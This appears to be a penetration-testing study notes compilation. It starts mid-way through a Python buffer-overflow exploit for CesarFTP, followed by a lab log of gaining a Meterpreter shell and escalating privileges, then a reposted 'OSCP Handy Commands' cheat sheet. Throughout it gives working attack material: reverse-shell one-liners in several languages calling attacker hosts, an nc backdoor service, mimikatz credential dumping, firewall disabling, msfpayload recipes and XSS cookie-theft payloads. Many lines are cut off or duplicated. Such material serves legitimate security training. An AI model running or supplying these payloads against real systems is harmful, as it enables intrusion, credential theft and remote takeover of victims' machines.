buf += "\x31\x1e\x43"
def intel_order(i):
a = chr(i % 256)
i = i >> 8
b = chr(i % 256)
i = i >> 8
c = chr(i % 256)
i = i >> 8
d = chr(i % 256)
str = "%c%c%c%c" % (a, b, c, d)
return str
host = sys.argv[1]
port = 21
user = "ftp"
password = "ftp"
EIP = 0x77fb59cc #JMP ESP from ntdll.dll
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
s.send("user %s\r\n" % (user))

print s.recv(1024)
s.send("pass %s\r\n" % (password))

print s.recv(1024)
buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "\x90" * 40 + buf
buffer += "\r\n"
print "len: %d" % (len(buffer))
s.send(buffer)
print s.recv(1024)
s.close()
Create handler:
root@St0rn:~/Desktop# msfcli exploit/multi/handler LHOST=192.168.23.10 LPORT=444 PAYLOAD=windows/meterp

[*] Initializing modules...
LHOST => 192.168.23.10

LPORT => 444
PAYLOAD => windows/meterpreter/reverse_ord_tcp
[*] Started reverse handler on 192.168.23.10:444
[*] Starting the payload handler...
Launch exploit:
root@St0rn:~/exploit# python caesarftp.py 192.168.23.112

220 CesarFTP 0.99g Server Welcome !
331 User login OK, waiting for password
230 User password OK, CesarFTP server ready
len: 844
get a shell:
root@St0rn:~/Desktop# msfcli exploit/multi/handler LHOST=192.168.23.10 LPORT=444 PAYLOAD=windows/meterp

[*] Initializing modules...
LHOST => 192.168.23.10

LPORT => 444
PAYLOAD => windows/meterpreter/reverse_ord_tcp
[*] Started reverse handler on 192.168.23.10:444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (769536 bytes) to 192.168.23.111
[*] Meterpreter session 1 opened (192.168.23.10:444 -> 192.168.23.111:2824) at 2014-08-17 23:20:37 +0200
meterpreter >
get proof.txt:
meterpreter > shell

[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 544 created.
Channel 41 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\offsec>cd ../Administrator/Desktop

cd ../Administrator/Desktop
C:\Documents and Settings\Administrator\Desktop>dir

dir
Volume in drive C has no label.
Volume Serial Number is 5454-E9C1
Directory of C:\Documents and Settings\Administrator\Desktop
02/07/2011 05:10 PM <DIR> .

02/07/2011 05:10 PM <DIR> ..
08/25/2006 11:32 AM <DIR> Plugins
08/17/2014 11:23 PM 33 proof.txt
1 File(s) 33 bytes
3 Dir(s) 728,535,040 bytes free
C:\Documents and Settings\Administrator\Desktop>"C:\Documents and Settings\offsec\Desktop\Extras\nc.exe" 192.1

C:\Documents and Settings\offsec\Desktop\Extras\nc.exe 192.168.23.10 66 < proof.txt
C:\Documents and Settings\Administrator\Desktop>
On my machine:
root@St0rn:~/Desktop# nc -lvp 66 > proof.txt

listening on [any] 66 ...
192.168.23.112: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.23.10] from (UNKNOWN) [192.168.23.112] 3014
^C
root@St0rn:~/Desktop# cat proof.txt
33a84c00e939cc5bc0ced0b8b246ab3e
privilege escalation:
First create a job:
C:\Documents and Settings\offsec>at 16:44 /interactive cmd.exe

at 16:44 /interactive cmd.exe
Added a new job with job ID = 1
Change password of user1:
C:\Documents and Settings\offsec>net user user1 storn

net user user1 storn
The command completed successfully.
and connect to rdp:
see system_shell.png
168.23.10 LPORT=444 R | msfencode -b '\x00\x09\x0a\x0d\x22\x25\x26\x27\x2f\x3a\x3e\x3f\xFF\x5c' -t python
PAYLOAD=windows/meterpreter/reverse_ord_tcp e
PAYLOAD=windows/meterpreter/reverse_ord_tcp e
-17 23:20:37 +0200

Desktop\Extras\nc.exe" 192.168.23.10 66 < proof.txt
\x5c' -t python
# Site Reference:
https://sathisharthars.wordpress.com/2015/01/28/oscp-offensive-security-certified-professional-handy-tips-and-tric
OSCP Handy Commands by sathisharthars
Nmap Full Web Vulnerable Scan:
mkdir /usr/share/nmap/scripts/vulscan
cd /usr/share/nmap/scrripts/vulscan
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse
nmap -sS -sV –script=vulscan/vulscan.nse target
nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV –script=vuln target
nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target
Dirb Directory Bruteforce:
dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt
Nikto Scanner:
nikto -C all -h http://IP
WordPress Scanner:
wpscan –url http://IP/ –enumerate p

Uniscan Scanning:
uniscan.pl -u target -qweds

HTTP Enumeration:
httprint -h http://www.example.com -s signatures.txt
SKIP Fish Scanner:
skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
Uniscan Scanning:
uniscan –u http://www.hubbardbrook.org –qweds
Here, -q – Enable Directory checks

-w – Enable File Checks
-e – Enable robots.txt and sitemap.xml check
-d – Enable Dynamic checks
-s – Enable Static checks
Skipfish Scanning:
m-time threads -LVY donot update after result
skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
Nmap Ports Scan:
1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
2)fargement
3)data packed – like orginal one not scan packet
4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
5) nmap –source-port 53 target

nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC 192.168.31.10-12 (all scan default)

Netcat Scanning:
nc -v -w 1 target -z 1-1000
for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done
US Scanning:
us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535
Unicornscan Scanning:
unicornscan X.X.X.X:a -r10000 -v
Kernel Scanning:
xprobe2 -v -p tcp:80:open 192.168.6.66

Samba Enumeartion:
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U “” target
enum4linux target
SNMP ENumeration:
snmpget -v 1 -c public IP version
snmpwalk -v 1 -c public IP
snmpbulkwalk -v 2 -c public IP
Windows Useful commands:
net localgroup Users
net localgroup Administrators
search dir/s *.doc
system(“start cmd.exe /k $cmd”)

sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
Plink Tunnel:
plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X
Enable RDP Access:
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Turn Off Firewall:
netsh firewall set opmode disable

Meterpreter:
run getgui -u admin -p 1234
run vnc -p 5043
Add User Windows:
net user test 1234 /add
net localgroup administrators test /add
Mimikatz:
privilege::debug
sekurlsa::logonPasswords full
Passing the Hash:
pth-winexe -U hash //IP cmd

Password Cracking using Hashcat:
hashcat -m 400 -a 0 hash /root/rockyou.txt
Netcat commands:
c:> nc -l -p 31337
#nc 192.168.0.10 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 192.168.0.10 31337 > secret.txt
Banner Grabbing:
nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: SPOOFED-BROWSER
Referrer: K0NSP1RACY.COM
<enter>
<enter>
window reverse shell:

c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe
nc -lp 80
#nc -lp 31337 -e /bin/bash

nc 192.168.0.11 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
Find all SUID root files:
find / -user root -perm -4000 -print
Find all SGID root files:
find / -group root -perm -2000 -print
Find all SUID and SGID files owned by anyone:
find / -perm -4000 -o -perm -2000 -print
Find all files that are not owned by any user:

find / -nouser -print
Find all files that are not owned by any group:
find / -nogroup -print
Find all symlinks and what they point to:
find / -type l -ls
Python:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
python -m SimpleHTTPServer (Starting HTTP Server)
PID:
fuser -nv tcp 80 (list PID of process)
fuser -k -n tcp 80 (Kill Process of PID)

Hydra:
hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)
Mount Remote Windows Share:
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
Compiling Exploit in Kali:
gcc -m32 -o output32 hello.c (32 bit)
gcc -o output hello.c (64 bit)
Compiling Windows Exploits on Kali:
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
NASM Command:
nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
SSH Pivoting:
ssh -D 127.0.0.1:1080 -p 22 user@IP
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains commands target
Pivoting to One Network to Another:
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
proxychains commands target

Pivoting Using metasploit:
route add 10.1.1.0 255.255.255.0 1
route add 10.2.2.0 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
Exploit-DB search using CSV File:
searchsploit-rb –update
searchsploit-rb -t webapps -s WEBAPP
searchsploit-rb –search=”Linux Kernel”
searchsploit-rb -a “author name” -s “exploit name”
searchsploit-rb -t remote -s “exploit name”
searchsploit-rb -p linux -t local -s “exploit name”
For Privilege Escalation Exploit search:

cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3
Metasploit Payloads:
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x0
Create a Linux Reverse Meterpreter Binary
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfe
Create Reverse Shell (Shellcode)
msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -b
Create a Reverse Shell Python Script
msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py
Create a Reverse ASP Shell
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfe
Create a Reverse Bash Shell
msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh
Create a Reverse PHP Shell
msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php
Edit shell.php in a text editor to add <?php at the beginning.
Create a Windows Reverse Meterpreter Binary
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell
Security Commands In Linux:
find programs with a set uid bit
# find / -uid 0 -perm -4000

find things that are world writable
# find / -perm -o=w
find names with dots and spaces, there shouldn’t be any

# find / -name ” ” -print
# find / -name “..” -print
# find / -name “. ” -print
# find / -name ” ” -print
find files that are not owned by anyone

# find / -nouser
look for files that are unlinked
# lsof +L1
get information about procceses with open ports

# lsof -i
look for weird things in arp

# arp -a
look at all accounts including AD

# getent passwd
look at all groups and membership including AD
# getent group
list crontabs for all users including AD

# for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done
#generate random passwords

cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4
# find all immutable files, there should not be any

find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
# fix immutable files

chattr -i file
Windows Buffer Overflow Exploitation Commands:
msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x0

COMMONLY USED BAD CHARACTERS:
\x00\x0a\x0d\x20 For http request

\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
Useful Commands:
pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
!pvefindaddr pattern_create 5000

!pvefindaddr suggest
!pvefindaddr modules
!pvefindaddr nosafeseh
!mona config -set workingfolder C:\Mona\%p

!mona config -get workingfolder
!mona mod
!mona bytearray -b “\x00\x0a”
!mona pc 5000
!mona po EIP
!mona suggest
SEH:
!mona suggest
!mona nosafeseh
nseh=”\xeb\x06\x90\x90″ (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
ROP (DEP):
!mona modules
!mona ropfunc -m *.dll -cpb “\x00\x09\x0a’
!mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)
ASLR:
!mona noaslr
EGG Hunter:
!mona jmp -r esp

!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t ‘w00t’
GDB Debugger Commands:

Setting Breakpoint :
break *_start
Execute Next Instruction :

next
step
n
s
Continue Execution :
continue
c
Data :
checking ‘REGISTERS’ and ‘MEMORY’

Display Register Values : (Decimal , Binary , Hex )
print /d –> Decimal

print /t –> Binary
print /x –> Hex
O/P :
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax

$18 = 1101
(gdb) print /x $eax

$19 = 0xd
(gdb)
Display values of specific memory locations :

command : x/nyz (Examine)
n –> Number of fields to display ==>

y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
Cheat Codes:
Reverse Shellcode:
BASH:
bash -i >& /dev/tcp/192.168.23.10/443 0>&1
exec /bin/bash 0&0 2>&0

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $l
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1
PERL:
Shorter Perl reverse shell that does not depend on /bin/sh:
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdope
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdope
If the target system is running Windows use the following one-liner:
perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ w
perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ w
perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockad

perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockad
RUBY:
Longer Ruby reverse shell that does not depend on /bin/sh:
ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.r
ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.r
If the target system is running Windows use the following one-liner:

ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

PYTHON:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,12
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,12
PHP:
This code assumes that the TCP connection uses file descriptor 3.
php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’

If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK
NETCAT:
Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
nc -e /bin/sh attackerip 4444
nc -e /bin/sh 192.168.37.10 443

If the -e option is disabled, try this
mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe
mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc attackerip 4444
/bin/sh | nc 192.168.23.10 443
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/
If you have the wrong version of netcat installed, try
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
TELNET:
If netcat is not available or /dev/tcp

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
XTERM:
Xterm is the best..
To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do th
Xnest :1 # Note: The command starts with uppercase X
Xnest :1 # Note: The command starts with uppercase X
Then remember to authorise on your system the target IP to connect to you:
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xt
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
If you want anyone to connect to this spawned xterm try:
xhost + # Run this INSIDE the spawned xterm on the open X Server
xhost + # Run this INSIDE the spawned xterm on the open X Server
Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
xterm -display attackerip:1
xterm -display attackerip:1
Or:
$ DISPLAY=attackerip:0 xterm
$ DISPLAY=attackerip:0 xterm
It will try to connect back to you, attackerip, on TCP port 6001.
Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
/usr/openwin/bin/xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
PHP:

JAVA:
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; don
p.waitFor()
XSS Cheat Codes:
(“< iframes > src=http://IP:PORT </ iframes >”)
<script>document.location=http://IP:PORT</script>
‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83
”;!–“<XSS>=&{()}
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(‘XSS’)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&amp
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#00001
<IMG SRC=”jav ascript:alert(‘XSS’);”>
perl -e ‘print “<IMG SRC=javascript:alert(\”XSS\”)>”;’ > out
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( “>< iframes http://google.de < iframes >)
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E
<img src=asdf onerror=alert(document.cookie)>
Useful Links To Read and Learn:

Enumeration:
http://www.0daysecurity.com/penetration-testing/enumeration.html
Windows Shellcode:
http://farlight.org/index.html?type=shellcode
http://shell-storm.org/shellcode/
http://www.windowsexploits.com/
XSS Cheat Codes:
http://www.xenuser.org/xss-cheat-sheet/
https://gist.github.com/sseffa/11031135
https://html5sec.org/
Reverse Shell Cheat Codes:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://roo7break.co.uk/?p=215
Webshells:
http://www.r57shell.net/
Nikto Tutorial:
http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/
Exploit-db:
wget http://exploit-db.com/archive.tar.bz2
SNMP Enumeration:
http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09
http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html
SAMBA Enumeration:
http://www.iodigitalsec.com/windows-null-session-enumeration/
http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions
http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html
http://www.madirish.net/59
Passhing The Hash:
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/
Hashcat Tutorial:
http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/
Wordlist Download:
https://wiki.skullsecurity.org/Passwords
http://hqsoftwarecollection.blogspot.in/p/36gn-wordlist.html
NASM Tutorial:
http://en.kioskea.net/faq/1559-compiling-an-assembly-program-with-nasm
Buffer overflow Tutorial:
I consider this as intermediate and focus more on the real application exploit. Lupin from The Grey Corner explains expl
Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/beginning-stack-based-bu
SEH Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/seh-stack-based-wind
Windows Buffer Overflow Tutorial: Dealing with Character Translation – http://grey-corner.blogspot.com/2010/01/w
Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability – http://grey-corner.blogspot.com/2
Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump – http://grey-corner.blogspot.com/2010/02/
ADVANCED:
Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided most
Exploit writting tutorial part 1:Stack Based Overflows – http://www.corelan.be:8800/index.php/2009/07/19/exploit-w

Exploit writting tutorial part 2: Stack Based Overflows – jumping to shellcode – http://www.corelan.be:8800/index.php
Exploit writting tutorial part 3: SEH Based Exploits – http://www.corelan.be:8800/index.php/2009/07/25/writing-bu
Exploit writting tutorial part 3b: SEH Based Exploits – just another example – http://www.corelan.be:8800/index.php/
Exploit writting tutorial part 4: From Exploit to Metasploit – The basics – http://www.corelan.be:8800/index.php/2009
Exploit writting tutorial part 5: How debugger modules & plugins can speed up basic exploit development – http://www
Exploit writting tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR – http://www.corelan.be:8
Exploit writting tutorial part 7: Unicode – from 0x00410041 to calc – http://www.corelan.be:8800/index.php/2009/11
Exploit writting tutorial part 8: Win32 Egg Hunting – http://www.corelan.be:8800/index.php/2010/01/09/exploit-wr
Exploit writting tutorial part 9: Introduction to Win32 shellcoding – http://www.corelan.be:8800/index.php/2010/02/
SQL Injection Cheat Codes:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://resources.infosecinstitute.com/backdoor-sql-injection/
RFI/LFI Tutorials:
https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/
http://www.hackersonlineclub.com/lfi-rfi
https://0xzoidberg.wordpress.com/category/security/lfi-rfi/
NMAP Vulsan:
http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz
Online Hash Cracking:
http://www.objectif-securite.ch/
Dump Windows Password Hashes:
http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html
Windows Previlige Escalation:
http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html
Linux Previlige Escalation:
http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://www.rebootuser.com/?p=1758
Tunneling & Port Forwarding:
http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html (Very Good)

http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
http://www.danscourses.com/Network-Penetration-Testing/metasploit-pivoting.html
http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
http://www.offensive-security.com/metasploit-unleashed/Portfwd
http://www.offensive-security.com/metasploit-unleashed/Pivoting
http://www.howtoforge.com/reverse-ssh-tunneling
http://ftp.acc.umu.se/pub/putty/putty-0.57/htmldoc/Chapter7.html (Plink)
http://www.offensive-security.com/metasploit-unleashed/Msfvenom
Useful Links:
http://www.fuzzysecurity.com/tutorials.html – Exploit tutorials

https://www.corelan.be/index.php/articles/ – Exploit tutorials
http://www.securitytube.net/ – Training videos
http://www.offensive-security.com/blog/ – Offensive Security blog
http://blog.g0tmi1k.com/ – Security blog
http://carnal0wnage.attackresearch.com
http://cybershakti.my3gb.com/
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.securityfocus.com/
http://www.exploit-db.com/
http://nmap.org/nsedoc/
http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
http://www.fuzzysecurity.com/tutorials/16.html
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://pentestmonkey.net/tools/windows-privesc-check
Videos:
http://www.securitytube.net/
http://www.rmccurdy.com/scripts/videos/ (milliworm exploit tutorial)
http://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html (Offensive Secuirty Lectures)
Privilege Escalation in Windows:
http://www.youtube.com/watch?v=kMG8IsCohHA Encyclopaedia Of Windows Privilege Escalation – Brett Moore

http://www.youtube.com/watch?v=_8xJaaQlpBo DerbyCon 3 0 2105 Windows Attacks At Is The New Black Rob Fuller A
http://www.greyhathacker.net/?p=738 Elevating privileges by exploiting weak folder permissions
Buffer Overflow Tutorial:

http://www.frequency.com/video/athcon-hack-in-paris-demo-1/40181156
http://www.savevid.com/video/athcon-hack-in-paris-demo-2.html
http://www.frequency.com/video/athcon-hack-in-paris-demo-3/11306148
https://www.youtube.com/watch?v=ANlROJNWtCs&list=PLM0IiVYClP2vC3A6Uz_ESV86kBVYei5qx (Python Penetratio
https://www.youtube.com/watch?v=Sye3mu-EoTI (Bash Scripting by Peter Chubb)
https://www.youtube.com/watch?v=GPjcSxyIIUc (BASH Scripting by Lee Baird )
https://www.youtube.com/watch?v=kPxavpgos2I (LFI/RFI)
https://www.youtube.com/watch?v=pnqcHU2qFiA (LFI/RFI)
http://www.securitytube.net/video/7640 (Simple buffer overflow)
https://www.youtube.com/watch?v=y2zrEAwmdws (Mona.py)
http://www.securitytube.net/video/7735 (Avoiding bad characters)

PDF:
https://www.yumpu.com/en/document/view/14963680/from-sqli-to-shell (SQL Injection)
https://cyberwar.nl/d/hak5.org_LinuxUnixBSDPost-ExploitationCommandList_copy-20130228.pdf (Linux Unix Post Ex
http://www.scribd.com/doc/245679444/hak5-org-OSXPost-Exploitation-copy-20130228-pdf#scribd (Post Exploitatio
